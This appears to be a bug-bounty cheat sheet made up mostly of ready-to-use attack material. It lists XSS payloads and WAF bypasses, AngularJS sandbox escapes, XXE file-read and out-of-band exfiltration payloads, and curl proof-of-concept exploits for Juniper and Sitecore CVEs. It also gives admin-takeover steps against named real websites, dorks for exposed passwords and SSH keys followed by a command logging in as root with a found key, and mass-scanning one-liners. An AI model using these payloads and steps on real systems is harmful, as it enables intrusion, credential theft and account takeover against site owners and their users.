<button id="btn">Click Me</button><script>document.getElementById('btn').addEventListener('click', function() { alert(1); });</script>

87. HTML Audio with Malformed Tag

<audio src="javascript:alert(1)">Sound</audio>

88. CSS Import URL with JavaScript URI

@import url('javascript:alert(1)');

89. Exploiting InnerHTML Assignment in JavaScript

<script>document.body.innerHTML = '<img src=x onerror=alert(1)>';</script>

90. SVG Animation Injection

<svg><animate onbegin="alert(1)"></animate></svg>

91. Exploiting HTML <isindex> Element

<isindex action="javascript:alert('XSS')">

92. HTML <listing> Tag Abuse

<listing oncopy=alert(1)>Hello</listing>

93. Targeting Cross-Origin Redirects with XSS Payloads

<a href="//attacker.com/"><img src="javascript:alert(1)"></a>

94. Abuse of innerText JavaScript Property

<script>document.querySelector('body').innerText += '<img src=x onerror=alert(1)>';</script>

95. Use of <bgsound> for XSS Execution (IE)

<bgsound src="javascript:alert(1)">

96. Exploit CSS background for XSS

<div style="background:url(javascript:alert('XSS'))">CSS Background</div>

97. Leverage window.location for Redirection-Based XSS

<script>window.location = 'javascript:alert(1)';</script>

98. Clickjacking Using XSS Payloads

<iframe src="http://example.com/" style="opacity:0;" onload="alert(1)"></iframe>

99. XSS Injection Using <keygen>

<keygen autofocus onfocus=alert(1)>

100. Inline JavaScript URL with Percent Encoding

<a href="javascript%3Aalert('XSS')">Click Me</a>

101. Obfuscate Payload Using String Concatenation

<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

102. CSS Selector Exploit in JavaScript

<style>div::after {content: "XSS";}</style>
<script>document.querySelector("div").onmouseenter = () => alert(1);</script>

103. Abuse of <applet> Tag

<applet code="javascript:alert(1)"></applet>  // Deprecated but relevant in very old browsers

104. JavaScript Injection Through Query Parameter

http://example.com/?param=<script>alert('XSS')</script>

105. SVG Use with JavaScript URI

<svg><use xlink:href="javascript:alert(1)"></use></svg>

106. Exploit via HTML Form Input Value

<form><input value="XSS" onfocus="alert(1)" autofocus></form>

107. Using location.hash to Inject XSS

<script>location.hash = "javascript:alert(1)";</script>

108. Injection Using JavaScript .onload Event Handler

<img src="x" onload="alert(1)">

109. Using CSS position:fixed with JavaScript URL> [!warning]

<a style="position:fixed;" href="javascript:alert(1)">Fixed</a>

110. Data Attributes for Inline JavaScript

<button data-action="javascript:alert(1)">Click</button>

111. Execution Using <menu> Tag

<menu type="context" id="menu"><menuitem label="Click me" onclick="alert(1)"></menuitem></menu>

112. Combining JavaScript and CSS in <svg>

<svg><style>@import 'javascript:alert(1)';</style></svg>

113. Payload Split Between Multiple <script> Tags

<script>aler</script><script>t(1)</script>

114. Inline JavaScript Comment to Break Filters

<script>alert/*hello*/(1)</script>

115. JavaScript Constructor from User Input

<script>Function.constructor('alert(1)')()</script>

116. Abuse of JavaScript Ternary Operator

<script>1 ? alert(1) : ''</script>

117. Exploit CSS Visibility Property for Hidden Script

<div style="visibility:hidden" onclick="alert(1)">Hidden</div>

118. Abusing <plaintext> Tag

<plaintext><script>alert(1)</script>
### **60. Multi-Layer Encoded and Obfuscated XSS Payloads**
Leveraging multiple encoding schemes to evade signature-based filters.
**Chrome XSS-Auditor Bypass** by [@vivekchsm](https://twitter.com/vivekchsm)

```html
<svg><animate xlink:href=#x attributeName=href values=&#106;avascript:alert(1) /><a id=x><rect width=100 height=100 /></a>

Chrome < v60 beta XSS-Auditor Bypass

<script src="data:,alert(1)%250A-->

Other Chrome XSS-Auditor Bypasses

<script>alert(1)</script

<script>alert(1)%0d%0a-->%09</script

<x>%00%00%00%00%00%00%00<script>alert(1)</script>

Safari XSS Vector by @mramydnei

<script>location.href;'javascript:alert%281%29'</script>

XSS Polyglot by Ahmed Elsobky

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Kona WAF (Akamai) Bypass

\');confirm(1);//

ModSecurity WAF Bypass Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html

<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>

Wordfence XSS Bypasses

<meter onmouseover="alert(1)"

'">><div><meter onmouseover="alert(1)"</div>"

>><marquee loop=1 width=0 onfinish=alert(1)>

Incapsula WAF Bypasses by @i_bo0om

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

<img/src=q onerror='new Function`al\ert\`1\``'>

jQuery < 3.0.0 XSS by Egor Homakov

$.get('http://sakurity.com/jqueryxss')

In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:

1. Find any cross domain requests to untrusted domains which may inadvertently execute script.

2. Find any requests to trusted API endpoints where script can be injected into data sources.

URL verification bypasses (works without 	 too)

javas	cript://www.google.com/%0Aalert(1)

Markdown XSS

[a](javascript:confirm(1))

[a](javascript://www.google.com%0Aprompt(1))

[a](javascript://%0d%0aconfirm(1))

[a](javascript://%0d%0aconfirm(1);com)

[a](javascript:window.onerror=confirm;throw%201)

[a]: (javascript:prompt(1))

[a]:(�javascript:alert(1))           //Add SOH Character

Flash SWF XSS

• ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf

• plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&

• plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)

• FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert`1`

• videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29

• YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//

• YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<

• Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()

• AutoDemo: control.swf?onend=javascript:alert(1)//

• Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//

• Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//

• JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)

• SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//

• Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf

• FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf

Note: Useful reference on constructing Flash-based XSS payloads available at MWR Labs.

Lightweight Markup Languages

RubyDoc (.rdoc)

XSS[JavaScript:alert(1)]

Textile (.textile)

"Test link":javascript:alert(1)

reStructuredText (.rst)

`Test link`__.

__ javascript:alert(document.domain)  

Unicode characters

†‡•＜img src=a onerror=javascript:alert('test')>…‰€

AngularJS Template Injection based XSS

For manual verification on a live target, use angular.version in your browser console

1.0.1 - 1.1.5 by Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1 by Jan Horn (Google)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5 by Gareth Heyes (PortSwigger)

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

1.2.6 - 1.2.18 by Jan Horn (Google)

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23 by Mathias Karlsson

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29 by Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

1.3.0 by Gábor Molnár (Google)

{{!ready && (ready = true) && (
      !call
      ? $$watchers[0].get(toString.constructor.prototype)
      : (a = apply) &&
        (apply = constructor) &&
        (valueOf = call) &&
        (''+''.toString(
          'F = Function.prototype;' +
          'F.apply = F.a;' +
          'delete F.a;' +
          'delete F.valueOf;' +
          'alert(1);'
        ))
    );}}

1.3.1 - 1.3.2 by Gareth Heyes (PortSwigger)

{{
    {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
    'a'.constructor.prototype.charAt=''.valueOf; 
    $eval('x=alert(1)//'); 
}}

1.3.3 - 1.3.18 by Gareth Heyes (PortSwigger)

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 

  'a'.constructor.prototype.charAt=[].join;
  $eval('x=alert(1)//');  }}

1.3.19 by Gareth Heyes (PortSwigger)

{{
    'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; 
    $eval('x=alert(1)//'); 
}}

1.3.20 by Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9 by Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

1.5.0 - 1.5.8 by Ian Hickey

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

1.5.9 - 1.5.11 by Jan Horn (Google)

{{
    c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
    c.$apply=$apply;c.$eval=b;op=$root.$$phase;
    $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
    C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
    B=C(b,c,b);$evalAsync("
    astNode=pop();astNode.type='UnaryExpression';
    astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
    astNode.argument={type:'Identifier',name:'foo'};
    ");
    m1=B($$asyncQueue.pop().expression,null,$root);
    m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
    $eval('a(b.c)');[].push.apply=a;
}}

1.6.0+ (no Expression Sandbox) by Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

Content Security Policy (CSP) bypass via JSONP endpoints

Grab the target's CSP:

curl -I http://example.com | grep 'Content-Security-Policy'

Either paste the CSP into https://csp-evaluator.withgoogle.com/ or just submit the target's address into the "Content Security Policy" field. The CSP Evaluator will notify you if one of the whitelisted domains has JSONP endpoints.

Now we can use a Google dork to find some JSONP endpoints on the domains listed above.

site:example.com inurl:callback

##XXE LFI Test

<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

Blind LFI test (when first case doesn't return anything)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>

Access Control bypass (loading restricted resources - PHP example)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>

SSRF Test

<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>

XEE (XML Entity Expansion - DOS)

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

XEE #2 (Remote attack - through external xml inclusion)

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test<lol></lolz>

XXE FTP HTTP Server

https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb

http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
%remote;
%send;
]>
<data>4</data>

File stored on http://publicServer.com/parameterEntity_sendftp.dtd

<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;

XXE UTF-7

<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

To convert between UTF-8 & UTF-7 use recode. recode UTF8..UTF7 payload-file.xml

# Template Injection

Ruby

<%=`id`%>

Twig

The following payload should output 49.

{{7*'7'}}

Jinja

This payload should output 7777777.

{{7*'7'}}

Methods

XSS AUTOMATION SCRIPTS

1st method:-

STEP 1 : Subdomain enumeration

---> assetfinder url >> urls.txt

STEP 2 : live host

---> httpx -l urls.txt -o livehosts.txt

STEP 3 : url crawl

---> katana -u livehosts.txt -o endpoints.txt

STEP 4: xss vibes

---> python3 main.py -f endpoints.txt -o vuln.txt -t 10

2nd method :

STEP 1 :

---> waybackurls http://testphp.vulnweb.com | tee param.txt

STEP 2 :

---> cat param.txt | grep = | tee param1.txt

STEP 3 :

---> cat param1.txt | nuclei -t fuzzing-templates

Subdomain Takeover - Github (POC)

Recon tools :

1. knocky - > for subdomain enumeration

2. Subszy -> to check it is vulnerable to subdomain takeover

Website :

1. to check dns lookup | |___ https://www.toolsvoid.com/dig-dns-lookup/ (or ) [dig, nslooup ]

2. Reference Documentation | |___ https://github.com/EdOverflow/can-i-take-over-xyz

Let's Begin hunt<<<

STEP 1 : subdomain enumeration | |___ python knockpy.py -w wordlist/wordlist.txt taget.com --save targets

STEP 2 : after scan completion | |___ check for 404 and alias and save file in guess.txt

STEP 3 : scan using subzy to check vulnerble or not | |___ subzy run --targets guess.txt

STEP 4 : After found it is Vulnerable | |___ Try to takeover the subdomain

   SQL AUTOMATION SCRIPTS

echo https://cutm.ac.in/ | gau | urldedupe -qs | gf sqli

python3 main.py -u 'https://cutm.ac.in/payu/skill/index.php?id=49' -p payloads/xor.txt -t 5 -o sqli.txt

ghauri -u 'https://cutm.ac.in/payu/skill/index.php?id=49' --dbs --batch

sqlmap -m parameters.txt --batch --level=5 --risk=3 --dbs

 SHELL SCRIPTS

sniper -t domain.com -m stealth -o -re

RECON PROCESS STAGE 1

STEP 1 : subdomain enumeration

 You can use subfinder, assetfinder or any subdomain enumeration tools 

---> subfinder -d vulnweb.com -o subdomains.txt

STEP 2 : check Live hosts

 httpx , httpx-toolkit or any other 

---> httpx - l urls.txt -o livehosts.txt

STEP 3 : Use url crawler

 waybackurls , katana or any other tools 

---> waybackurls http://testphp.vulnweb.com | tee param.txt

STEP 4 : Scanning using Nuclei

 nuclei , magicrecon , spyhunt , or any other tools 

---> nuclei -l param.txt -severity high,critical,medium -t /home/rohit/.local/nuclei-templates/ -dast

RECON PROCESS STAGE 1

STEP 1 : subdomain enumeration

You can use subfinder, assetfinder or any subdomain enumeration tools 

---> subfinder -d vulnweb.com -o subdomains.txt

STEP 2 : check Live hosts

 httpx , httpx-toolkit or any other 

---> httpx - l urls.txt -o livehosts.txt

STEP 3 : Use url crawler

 waybackurls , katana or any other tools 

---> waybackurls http://testphp.vulnweb.com | tee param.txt

STEP 4 : Scanning using Nuclei

nuclei , magicrecon , spyhunt , or any other tools 

---> nuclei -l param.txt -severity high,critical,medium -t /home/rohit/.local/nuclei-templates/ -dast

Now iam going to take one url http://testphp.vulnweb.com

Still scanning is going on , also able to find xss , lfi and other vuln using nuclei

  Instant bug bounty 

Google Dork:

site:.domain.com "join.slack" ext:pdf "invite" site:.domain.com "join.slack" ext:pdf "invite" "internal" site:.domain.com "join.slack" ext:pdf "invite" "confidential" site:.domain.com "join.slack" ext:pdf "invite" "highly confidential"

================================ Google Dork intitle:"Roxy file manager"

RedisDB + LDAP - Network Services Bug Hunting Shodan Dorks

RedisDB Unauth "redis_version"

LDAP Null Bind "LDAP:" -401 -403 -404 -400 -unauthorized -forbidden hostname:"*.domain.com"

Shodan Dorks

FTP port:21 "Login Successful" hostname:"*.domain.com"

VNC "authentication disabled" "RFB 003.008" hostname:"*.domain.com"

================================

Google Dorks inurl:chat site:.edu ext:txt inurl:chat site:.edu.* ext:txt inurl:chat site:.gov ext:txt inurl:chat site:.gov.* ext:txt inurl:chat site:*.domain.com ext:txt

inurl:chat site:.edu ext:log inurl:chat site:.edu.* ext:log inurl:chat site:.gov ext:log inurl:chat site:.gov.* ext:log inurl:chat site:*.domain.com ext:log

================================

SHODAN DORK

http.favicon.hash:2141724739

Exif

Summary:

When a user uploads an image in example.com, the uploaded image’s EXIF Geolocation Data does not gets stripped. As a result, anyone can get sensitive information of example.com users like their Geolocation, their Device information like Device Name, Version, Software & Software version used etc.

Steps to reproduce:

1. Got to Github ( https://github.com/ianare/exif-samples/tree/master/jpg)

2. There are lot of images having resolutions (i.e 1280 * 720 ) , and also whith different MB’s .

3. Go to Upload option on the website

4. Upload the image

5. see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect , edit it as html )

6. open it (http://exif.regex.info/exif.cgi)

7. See wheather is that still showing exif data , if it is then Report it.

Reports (Hackerone)

• IDOR with Geolocation data not stripped from images

POC EXPLOIT

curl -kv "https:///about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' curl -kv "http:///about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

(Try to add the curl flag option --insecure if doesn't work) curl -kv "https:///about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' --insecure curl -kv "http:///about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' --insecure

(if the port is not 80,443 we need to add the port as well in target value http://ip:port/about.php........)

AUTOMATED PUBLIC SCRIPTS

git clone https://github.com/Asbawy/Automation-for-Juniper-cve-2023-36845 ./cve-2023-36845.sh -f ip_list.txt

================================

👉 One Liner cURL Command (PoC) for the Sitecore Remote Code Execution Vulnerability🛡️.

CVE: 2023-35813 (discovered by @mwulftange) CVSS Score: 9.8 Severity: Critical

curl --data '__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl("%3C%25%40Register%0A%20%20%20%20%20%20%20%20TagPrefix%20%3D%20%27x%27%0A%20%20%20%20%20%20%20%20Namespace%20%3D%20%27System.Runtime.Remoting.Services%27%0A%20%20%20%20%20%20%20%20Assembly%20%3D%20%27System.Runtime.Remoting%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089%27%0A%20%20%20%20%25%3E%0A%20%20%20%20%3Cx%3ARemotingService%20runat%3D%27server%27%0A%20%20%20%20%20%20%20%20Context-Response-ContentType%3D%27THIS%20IS%20VULNERABLE%27%0A%20%20%20%20%2F%3E")' /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index -v

Sometimes, also need to include the curl flag option (--insecure) to disable SSL certificate verification.

Steps:

1. Change the target and run the command in your terminal.

2. Verify by checking Response Header - Content-Type: THIS IS VULNERABLE

Shodan Dork: http.title:"Sitecore" "200"

http.title:"Sitecore" "200" -401 -400 -404 -502 -forbidden -unauthorized

grep -oP '(?<=).*?(?=)' ips.html > ips cat ips | nuclei -t /home/kali/.local/nuclei-templates/http/cves/2023/CVE-2023-35813.yaml

================================

Google Dork: site:irclog.. site:irclog...edu site:irclog..edu.

Fuzzing endpoints: irclog , irclogs Fuzzing types: file,directory,subdomain(recursive)

================================ Find External Broken Links

blc https://www.example.com -ro -i > broken-links-test.txt

cat broken-links-test.txt | grep "BROKEN"

================================

Google Dorks: "MYSQL_PASSWORD" ext:txt "DB_PASSWORD" ext:txt "PGPASSWORD" ext:txt "MONGODB_PASSWORD" ext:txt

Dork with all possible extensions "MYSQL_PASSWORD" (ext:txt | ext:log | ext:conf | ext:config | ext:sql | ext:db | ext:ini | ext:cfg | ext:yaml) "DB_PASSWORD" (ext:txt | ext:log | ext:conf | ext:config | ext:sql | ext:db | ext:ini | ext:cfg | ext:yaml) "PGPASSWORD" (ext:txt | ext:log | ext:conf | ext:config | ext:sql | ext:db | ext:ini | ext:cfg | ext:yaml) "MONGODB_PASSWORD" (ext:txt | ext:log | ext:conf | ext:config | ext:sql | ext:db | ext:ini | ext:cfg | ext:yaml)

================================ Google Dork: intitle:"index of" "id_rsa" site:.gov intitle:"index of" "id_rsa" site:.gov.* intitle:"index of" "id_rsa" site:.edu intitle:"index of" "id_rsa" site:.edu.* intitle:"index of" "id_rsa" site:*.domain.com intitle:"index of /.ssh" intitle:"index of /" intext:id_rsa

save the file as id_rsa chmod 600 id_rsa ssh -i id_rsa root@serverip

The SSH private key, often found in files like id_rsa, is similar to a digital master key, granting access to sensitive systems and data. If exposed, attackers can exploit this key to impersonate legitimate users, gaining unauthorized entry to servers, databases, or cloud environments. Once inside, they can execute malicious activities such as data theft, tampering, or even complete system compromise.

================================

Step1:First find endpoint to fuzz for hidden parameters

Google Dorks: site:.domain.com ext:php site:.domain.com ext:asp site:.domain.com ext:aspx site:.domain.com ext:jsp site:*.domain.com ext:jspx

site:*.domain.com (ext:php OR ext:asp OR ext:aspx OR ext:jsp OR ext:jspx)

Step2:Run arjun on those endpoints

Tool Link : https://github.com/s0md3v/Arjun

Step3: Test for XSS,SQLi,HTMLi,SSTI,LFI,RFI,etc.. on those new parameters collected

Arjun is a command-line tool specifically designed to look for hidden HTTP parameters. Today’s web applications have lots of parameters to make an application dynamic. Arjun will try to discover those parameters and give you a new set of endpoints to test on.

By default, Arjun makes use of a default wordlist but this can be modified by the user. It is a multi-threaded application, can handle rate limiting, allows input of custom headers, and most importantly, supports GET, POST, XML, and JSON methods.

================================ Google Dork: inurl:/boss/servlet Payload: /boss/app/report/popup.html?/etc/passwd

A vulnerability was found in Boss Mini 1.4.0 Build 6221. It has been classified as critical. This affects an unknown part of the file boss/servlet/document. The manipulation of the argument path leads to file inclusion. It is possible to initiate the attack remotely.

Google Dork: intitle:"index of /.git"

Exposed git directory along with sensitive information (P3/P4) Exposed git directory with no sensitive information (P5)

Git, a popular version control system, is widely used by developers for managing source code. However, misconfigurations or oversight in the Git repository settings can lead to the exposure of sensitive data, including source code, configuration files, and even credentials.

================================

1. Admin Panel Bypass | privilage escalation with JWT (JSON Web Token) | Bug Bounty

target : https://anytask.com/

WEBSITE : to craft payload

              ---> https://jwt.one

capture the json token and change the role ROLE_USER to ROLE_ADMIN

Hence we had successfully taken admin panel

subsrcibe to hack with rohit if you like my videos

1. Strapi Admin Dashboard Takeover Vulnerability

cause :

---> admin dashboard takeover via password reset

target :

---> https://savingthyme.ca/

End-Point :

---> POST /admin/auth/reset-password

ADD header :

---> Content-Type: application/json

Vulnerable Post Data: ---> {"code": {"$gt": 0}, "password": "hacker123", "passwordConfirmation":"hacker123"}

successfully takeover the admin panel

• [ # One-Liners for bug bounty

Thanks to all who create these Awesome One Liners❤️

---

One Line recon using pd tools

subfinder -d redacted.com -all | anew subs.txt; shuffledns -d redacted.com -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt; dnsx -l subs.txt -r resolvers.txt | anew resolved.txt; naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt; httpx -l ports .txt | anew alive.txt; katana -list alive.txt -silent -nc -jc -kf all -fx -xhr -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -aff | anew urls.txt; nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txt

Subdomain Enumeration

## Juicy Subdomains
subfinder -d target.com -silent | dnsx -silent | cut -d ' ' -f1  | grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn'

## from BufferOver.run
curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u 

## from Riddler.io

curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

## from RedHunt Labs Recon API
curl --request GET --url 'https://reconapi.redhuntlabs.com/community/v1/domains/subdomains?domain=<target.com>&page_size=1000' --header 'X-BLOBR-KEY: API_KEY' | jq '.subdomains[]' -r

## from nmap
nmap --script hostmap-crtsh.nse target.com

## from CertSpotter
curl -s "https://api.certspotter.com/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

## from Archive
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

## from JLDC
curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

## from crt.sh
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

## from ThreatMiner
curl -s "https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u

## from Anubis
curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com"

## from ThreatCrowd
curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com"

## from HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com"

## from AlienVault
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/tesla.com/url_list?limit=100&page=1" | grep -o '"hostname": *"[^"]*' | sed 's/"hostname": "//' | sort -u

## from Censys
censys subdomains target.com

## from subdomain center
curl "https://api.subdomain.center/?domain=target.com" | jq -r '.[]' | sort -u

---

LFI:

cat targets.txt | (gau || hakrawler || waybackurls || katana) |  grep "=" |  dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"

---

Open Redirect:

echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I | grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n" ;done

cat subs.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain'

---

SSRF:

cat urls.txt | grep "=" | qsreplace "burpcollaborator_link" >> tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -fr 

---

XSS:

Knoxss mass hunting

file=$1; key="API_KEY"; while read line; do curl https://api.knoxss.pro -d target=$line -H "X-API-KEY: $key" -s | grep PoC; done < $file

cat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev "\.(jpeg|jpg|png|ico|gif|css|woff|svg)$" | uro | grep =  | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>"

cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe

echo target.com | (gau || hakrawler || waybackurls || katana) | grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done

cat urls.txt | grep "=" | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht

cat subs.txt | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 http://xsstrike.py -u @ --crawl'

---

Hidden Dirs:

dirsearch -l urls.txt -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-recursive --force-recursive --exclude-sizes=0B --random-agent --full-url -o output.txt

ffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.json
